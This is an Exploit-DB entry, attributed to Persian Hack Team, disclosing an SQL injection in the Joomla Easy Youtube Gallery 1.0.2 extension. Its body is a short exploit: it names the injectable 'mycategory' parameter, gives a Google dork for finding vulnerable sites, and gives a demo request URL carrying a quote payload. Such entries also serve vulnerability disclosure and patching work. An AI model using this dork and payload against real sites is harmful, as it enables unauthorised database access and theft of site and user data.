Joomla Easy Youtube Gallery 1.0.2 - SQL Injection Vulnerability

2016-03-22T00:00:00
ID EDB-ID:39590
Type exploitdb
Reporter Persian Hack Team
Modified 2016-03-22T00:00:00

Description

Joomla Easy Youtube Gallery 1.0.2 - SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            ######################
# Exploit Title :  Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage :  http://extensions.joomla.org/extension/easy-youtube-gallery
# Google Dork : inurl:com_easy_youtube_gallery mycategory 
# Date: 2016/03/22
# Version: 1.0.2
######################
# PoC:
# mycategory=[SQL]
# 
# Demo:
# http://server/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0%27&defaultvideo=9&Itemid=752
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
# Greetz : Milad_Hacking & FireKernel And You
######################